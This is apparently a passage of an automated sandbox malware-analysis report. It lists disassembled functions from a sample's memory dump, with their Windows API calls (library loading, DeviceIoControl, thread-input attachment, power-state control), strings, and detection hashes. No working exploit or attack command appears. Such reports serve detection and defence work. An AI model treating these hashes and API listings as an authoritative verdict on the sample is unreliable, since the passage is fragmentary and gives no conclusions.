CloseHandle.KERNEL32(00000000), ref: 004046DC
Sleep.KERNEL32(000005DC,00000000,00404966), ref: 004046E9

Strings

fI@, xrefs: 004046B8

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: CloseHandleObjectOpenProcessSingleSleepWait
String ID: fI@
API String ID: 3687349101-3833387868
Opcode ID: 99c742ba41ec4d519e81efbb754845b3f6dc2fbf62c5dbc2aca6217ec7f4fc99
Instruction ID: 10c5909f5e96f3544a610ad8ea435030473245de98d7bf4dc58a303f9565a192
Opcode Fuzzy Hash: 99c742ba41ec4d519e81efbb754845b3f6dc2fbf62c5dbc2aca6217ec7f4fc99
Instruction Fuzzy Hash: D9E0C235846661BBC7221720BC09FCE3EA0AF4EB03F018023F705B01F4CBB849808A9E

Function 004044D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Userenv.dll), ref: 004044DD
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004044EE

Strings

ljA, xrefs: 004044D0
Userenv.dll, xrefs: 004044D8
CreateEnvironmentBlock, xrefs: 004044E3

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateEnvironmentBlock$Userenv.dll$ljA
API String ID: 2574300362-3838505460
Opcode ID: 79f5e510a06085e8500188d4c4294cd5053875953387445ec4c2d9df56a2ee47
Instruction ID: 6f7bdf27930b1c318b274b237f51eeed017c3af958f8bb65982cea5f9f34ad82
Opcode Fuzzy Hash: 79f5e510a06085e8500188d4c4294cd5053875953387445ec4c2d9df56a2ee47
Instruction Fuzzy Hash: A8E086B5B44300AFCB108FB0AC446C63FA1BF49350F01C836B106F1560D7B6C140DB09

Function 00406C00 Relevance: 7.6, APIs: 5, Instructions: 89stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406C22
strlen.MSVCRT ref: 00406C3F
atoi.MSVCRT ref: 00406C4B
memset.MSVCRT ref: 00406C94
_mbscpy.MSVCRT ref: 00406CF7

Part of subcall function 004021EA: strlen.MSVCRT ref: 004021FB
Part of subcall function 004021EA: strlen.MSVCRT ref: 00402203
Part of subcall function 004021EA: _memicmp.MSVCRT ref: 0040221D

Part of subcall function 00404B83: GetModuleHandleA.KERNEL32(user32.dll,000001A4,00406CA6,00000000,?,?,00000000,000001A4), ref: 00404B8B
Part of subcall function 00404B83: GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00404B9B

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: strlen$memset$AddressHandleModuleProc_mbscpy_memicmpatoi
String ID:
API String ID: 4228955624-0
Opcode ID: 53ac7e8ff35fc623f34ee4d4642033c56517c47185007ad607d5252c2fe80b00
Instruction ID: 93486615b59a4dde5b44ee2ed2672bf91aa6b726c00e9a91a4cca03e1771d429
Opcode Fuzzy Hash: 53ac7e8ff35fc623f34ee4d4642033c56517c47185007ad607d5252c2fe80b00
Instruction Fuzzy Hash: 3D2126B19041086FFB14AB11DC81AEE77BCEF51318F1000BFF88AE5081EB39DB858A59

Function 0040AB9D Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

atoi.MSVCRT ref: 0040ABB6
atoi.MSVCRT ref: 0040ABC6
DeviceIoControl.KERNEL32(?,00230498,?,?,?,00000003,?), ref: 0040AC09
DeviceIoControl.KERNEL32(?,0023049C,?,00000003,?,?,?), ref: 0040AC53
CloseHandle.KERNEL32(?), ref: 0040AC65

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ControlDeviceatoi$CloseHandle
String ID:
API String ID: 1522275157-0
Opcode ID: 00662ba5b6ddd49a651b6f1537abed26ab2bd66afbcbb3008dd7de5bca364d26
Instruction ID: c1fbd2b0199e4e710ce3a72f730053a8cc1e98a524219f48c5dbd3f8a2324bc5
Opcode Fuzzy Hash: 00662ba5b6ddd49a651b6f1537abed26ab2bd66afbcbb3008dd7de5bca364d26
Instruction Fuzzy Hash: 0821B2726043989FEF258F358C919FE3FA9EF05344F28402AFD24C2292D275C595CBA5

Function 00407394 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00407397
GetDesktopWindow.USER32 ref: 004073A3
GetWindowRect.USER32(00000000,?), ref: 004073B4
GetWindowRect.USER32(?,?), ref: 004073BD
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 004074D6

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$Rect$DesktopParent
String ID:
API String ID: 1797514787-0
Opcode ID: 20873b3392aa30aeda10ee117beadd9fb2f1aa9fc0f27b6f1e4a2b6d134fb164
Instruction ID: 1b24c4f26a6f93e8f5900f88687527182e7d5d11646069502bb737d8379877e1
Opcode Fuzzy Hash: 20873b3392aa30aeda10ee117beadd9fb2f1aa9fc0f27b6f1e4a2b6d134fb164
Instruction Fuzzy Hash: 1801E87290001AEFCF01CFE8ED89DEEBB79EB48211B158625E611F6064C774AA019B25

Function 0040EC5D Relevance: 7.5, APIs: 5, Instructions: 26threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0040EC60
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EC6E
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,0040A031,?,?), ref: 0040EC80
SetFocus.USER32(?,?,?,0040A031,?,?), ref: 0040EC8A
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,0040A031,?,?), ref: 0040EC94

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentFocusProcessWindow
String ID:
API String ID: 968181190-0
Opcode ID: 5509f44d98a4abb7c32a9b48c1c6b10bc692b61a11b05128de335bef44a5ab99
Instruction ID: 1b8a40fc8357d425215f64022204e07fffd3e66a9f2521ef5b3618d9f5061f57
Opcode Fuzzy Hash: 5509f44d98a4abb7c32a9b48c1c6b10bc692b61a11b05128de335bef44a5ab99
Instruction Fuzzy Hash: C8E04F766002157BF6111BA0AD88FBB7E6CDB89B92F008436FB04E21A0C7655C119B79

Function 0040516E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53registryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0040519E
RegisterClassA.USER32(?), ref: 004051BA
CreateWindowExA.USER32(00000000,?,00411F27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004051D3

Strings

NirCmdWinCls, xrefs: 00405184

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ClassCreateHandleModuleRegisterWindow
String ID: NirCmdWinCls
API String ID: 2379504658-2221025072
Opcode ID: 46fc086de171697b51b3eb665449e6144375b78b157ae11fbb237ef700b5b9a2
Instruction ID: c82c1a96a14a35a172812571116eca598f6ac073f4e06209f00fb947b8cbc89e
Opcode Fuzzy Hash: 46fc086de171697b51b3eb665449e6144375b78b157ae11fbb237ef700b5b9a2
Instruction Fuzzy Hash: 46015AB2900218AFCB00DFD8D8C49DFBBBDEB09354B10453BFA05BA250D7B069448BA8

Function 0040299D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004029D3
strtol.MSVCRT ref: 004029FC

Part of subcall function 00402640: strtoul.MSVCRT ref: 00402648

Strings

-, xrefs: 004029E5

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memsetstrtolstrtoul
String ID: -
API String ID: 2460675154-2547889144
Opcode ID: 43f6ebea1ea782ffcb0722d5420e5f3076e196a5fad46d9ce7208abec98a23d7
Instruction ID: 602ed9324f2744c9d107e5a86e09c88cf1c41581cee0589d10f1f2579150fb35
Opcode Fuzzy Hash: 43f6ebea1ea782ffcb0722d5420e5f3076e196a5fad46d9ce7208abec98a23d7
Instruction Fuzzy Hash: CB017BB2E4426519EB3165649D1EBE7278C8B50318F1004B7F548321C3E9FC5DC186AA

Function 0040826D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004082A4
_mbscpy.MSVCRT ref: 004082BD
_mbscat.MSVCRT ref: 004082CC

Strings

\, xrefs: 004082AC

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: _mbscat_mbscpymemset
String ID: \
API String ID: 1061378040-2967466578
Opcode ID: 91959e86200bc444cbac1a960dd5249da237e60ead3debd2c30e14ab15917bba
Instruction ID: 6b078a4b7589396cc2cb8d5ca4f88c7a3b16becccc7b2fabc162a5c4c24a63e3
Opcode Fuzzy Hash: 91959e86200bc444cbac1a960dd5249da237e60ead3debd2c30e14ab15917bba
Instruction Fuzzy Hash: E30125F290420CAAEB21DAA4DD41BCAB7FC9B48304F1000AFA345A3182D674AA844B5D

Function 00401A8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00401A24: FreeLibrary.KERNEL32(?,00401A96), ref: 00401A2B

LoadLibraryA.KERNEL32(mscoree.dll), ref: 00401A9B
GetProcAddress.KERNEL32(00000000,LoadLibraryShim), ref: 00401AAD

Part of subcall function 00401A39: GetProcAddress.KERNEL32(?,CreateAssemblyCache), ref: 00401A5F

Strings

LoadLibraryShim, xrefs: 00401AA7
mscoree.dll, xrefs: 00401A96

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: LoadLibraryShim$mscoree.dll
API String ID: 2256533930-3672299883
Opcode ID: f6ab526f52811d55a2a7d145dad02e2d4a9a22483159d2facdc938cf2fc1eeaa
Instruction ID: bcfc0e44bf7d95b5b7574a9df26db9e499187755cb5fa66e02d1df17bda0f60a
Opcode Fuzzy Hash: f6ab526f52811d55a2a7d145dad02e2d4a9a22483159d2facdc938cf2fc1eeaa
Instruction Fuzzy Hash: CBF0F470711201ABDB20EBF68D4579B76D89F04794F10443AF541E22E1EAB8D940CA6C

Function 00406FEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040299D: memset.MSVCRT ref: 004029D3
Part of subcall function 0040299D: strtol.MSVCRT ref: 004029FC

GetModuleHandleA.KERNEL32(user32.dll), ref: 0040703B
GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00407047

Strings

user32.dll, xrefs: 0040702F
FlashWindowEx, xrefs: 00407041

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcmemsetstrtol
String ID: FlashWindowEx$user32.dll
API String ID: 606242470-2657433624
Opcode ID: 74c0528e6f011b9d6904137f5b2fffc1293369511cdb7383e2855ac9b6c8ccc0
Instruction ID: 5acbe37c41395e4f0ef807cd00649b845e68c465a0d7adbada4be9eedd5387d3
Opcode Fuzzy Hash: 74c0528e6f011b9d6904137f5b2fffc1293369511cdb7383e2855ac9b6c8ccc0
Instruction Fuzzy Hash: BEF08171E0020AAFDB00DFECC8497DEB7B4BB08344F10443AE206F2190D3B99A44CBA5

Function 004036B6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 004036C1
GetProcAddress.KERNEL32(00000000,ChangeDisplaySettingsExA), ref: 004036D1

Strings

ChangeDisplaySettingsExA, xrefs: 004036CB
user32.dll, xrefs: 004036B7

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: ChangeDisplaySettingsExA$user32.dll
API String ID: 1646373207-1164668496
Opcode ID: 0210f1b14839076db779bfca88d4ebc04b09fcf70d652fb6e82a948da1e85f9d
Instruction ID: 19051d83fba880625842f5f947da320450f6c63852da19973e0b5f5f4f9be67e
Opcode Fuzzy Hash: 0210f1b14839076db779bfca88d4ebc04b09fcf70d652fb6e82a948da1e85f9d
Instruction Fuzzy Hash: DAE0C2317003127BDB604FA1AC04F8B7E989F48B92F154436B605F62F0C66ACD98979D

Function 00404B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,000001A4,00406CA6,00000000,?,?,00000000,000001A4), ref: 00404B8B
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00404B9B

Strings

user32.dll, xrefs: 00404B84
EnumDisplayDevicesA, xrefs: 00404B95

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EnumDisplayDevicesA$user32.dll
API String ID: 1646373207-2278183399
Opcode ID: e86a95abb8f845ce19847a9f7263b48153abb35040a8311d0c90c0bf973016aa
Instruction ID: 4961fb83d3309bd57a05f6b1f65cfcb77a418269fc7555c0c9d5b8969bddb217
Opcode Fuzzy Hash: e86a95abb8f845ce19847a9f7263b48153abb35040a8311d0c90c0bf973016aa
Instruction Fuzzy Hash: C5D02B3170223027862197A06D08ECFBDD5AF84B803040922FA05E1054C3788E8047C8

Function 0040DA05 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,0040BDB6,00000001,SeShutdownPrivilege,?,force,?,standby,?,runas,?,elevatecmd,?,elevate), ref: 0040DA0D
GetProcAddress.KERNEL32(00000000,SetSystemPowerState), ref: 0040DA1D

Strings

SetSystemPowerState, xrefs: 0040DA17
kernel32.dll, xrefs: 0040DA06

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: SetSystemPowerState$kernel32.dll
API String ID: 1646373207-2693784556
Opcode ID: 41c876d01532474c65fe2bd678b38e02ae3497a50cd94dbb1678c1d9e49c5de0
Instruction ID: 2a4b9e6b3618ab48e7e9c0aaa8b9cd7a1f556b7e0fe2294b8a27118092a03531
Opcode Fuzzy Hash: 41c876d01532474c65fe2bd678b38e02ae3497a50cd94dbb1678c1d9e49c5de0
Instruction Fuzzy Hash: FED0A730B453202BCF615BF57C88BCB6E855B08FA1B148132B505F21E4CA78CF848A9C

Function 00405C19 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00405C21
memset.MSVCRT ref: 00405C2E

Part of subcall function 004025DE: memcpy.MSVCRT ref: 004025EC
Part of subcall function 004025DE: atoi.MSVCRT ref: 004025FA

Strings

now, xrefs: 00405C1C
A]@, xrefs: 00405C2A

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: atoimemcpymemsetstrlen
String ID: A]@$now
API String ID: 1328007670-3605966695
Opcode ID: 42a9299de6da293a071204fe9f5495f6b97a89703d110dd10f86499890e3a9cb
Instruction ID: 6a334ab0d537ce91b15ee429e28e39a7e166302a264b8f683cfcc12fbaba6d74
Opcode Fuzzy Hash: 42a9299de6da293a071204fe9f5495f6b97a89703d110dd10f86499890e3a9cb
Instruction Fuzzy Hash: 7911A7B19047087AF721ABB68C9BF9AB358EF01318F04843BE506AF1D2FAB89550475D

Function 00402E88 Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00402E94
??3@YAXPAX@Z.MSVCRT ref: 00402EB4

Part of subcall function 00402269: malloc.MSVCRT ref: 00402285
Part of subcall function 00402269: memcpy.MSVCRT ref: 0040229D
Part of subcall function 00402269: ??3@YAXPAX@Z.MSVCRT ref: 004022A6

??3@YAXPAX@Z.MSVCRT ref: 00402ED7
memcpy.MSVCRT ref: 00402EF7

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??3@$memcpy$mallocstrlen
String ID:
API String ID: 1171893557-0
Opcode ID: 63d33b09fd893f1cfb06e45a28eb3787ac4f0da315d261c0ef70105015b04338
Instruction ID: 0c798aaa5ec04bef33e4aa6798287ef591deafa1637401394e430fd9616f19b5
Opcode Fuzzy Hash: 63d33b09fd893f1cfb06e45a28eb3787ac4f0da315d261c0ef70105015b04338
Instruction Fuzzy Hash: 2B11CD72200604DFD730EF28D984D9BB7F5EF443247208A2EF452AB6D2C7B5B9458B94

Function 00407443 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0040299D: memset.MSVCRT ref: 004029D3
Part of subcall function 0040299D: strtol.MSVCRT ref: 004029FC

GetWindowRect.USER32(?,?), ref: 00407487
GetParent.USER32(?), ref: 004074A2
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004074B4
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 004074D6

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Window$ParentPointsRectmemsetstrtol
String ID:
API String ID: 1631573572-0
Opcode ID: 6aa8840c278283521ecc3d305f0bbf4977436e1c8acd2370e9c58d12afbf30aa
Instruction ID: fc3d602424b4e27ac52b3c0d68fc7d12cc6e32ecc0d8d0e89a6f2e50a12961af
Opcode Fuzzy Hash: 6aa8840c278283521ecc3d305f0bbf4977436e1c8acd2370e9c58d12afbf30aa
Instruction Fuzzy Hash: AB112972D00129AFDB00CFE8DC84AEEBB75FB48314F158529EA16F3250D774A905CB55

Function 0040317C Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 004031B8
memset.MSVCRT ref: 004031CF
memcpy.MSVCRT ref: 004031DF
??3@YAXPAX@Z.MSVCRT ref: 004031EC

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 4536d56c826f533afacf84f13237e722b6053a0f2299101c2619fe349b857098
Instruction ID: 04cfb5f477dae2442497efff473a6c05d1395866994748a14405027bf6395a16
Opcode Fuzzy Hash: 4536d56c826f533afacf84f13237e722b6053a0f2299101c2619fe349b857098
Instruction Fuzzy Hash: A21198B16002009BD728DF19DC51A96BFA9EB8C358B02C03EE409C73A5DB74D941CB18

Function 00402805 Relevance: 6.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040280C
??2@YAPAXI@Z.MSVCRT ref: 00402822
??3@YAXPAX@Z.MSVCRT ref: 0040286D

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ??2@??3@strlen
String ID:
API String ID: 3054257972-0
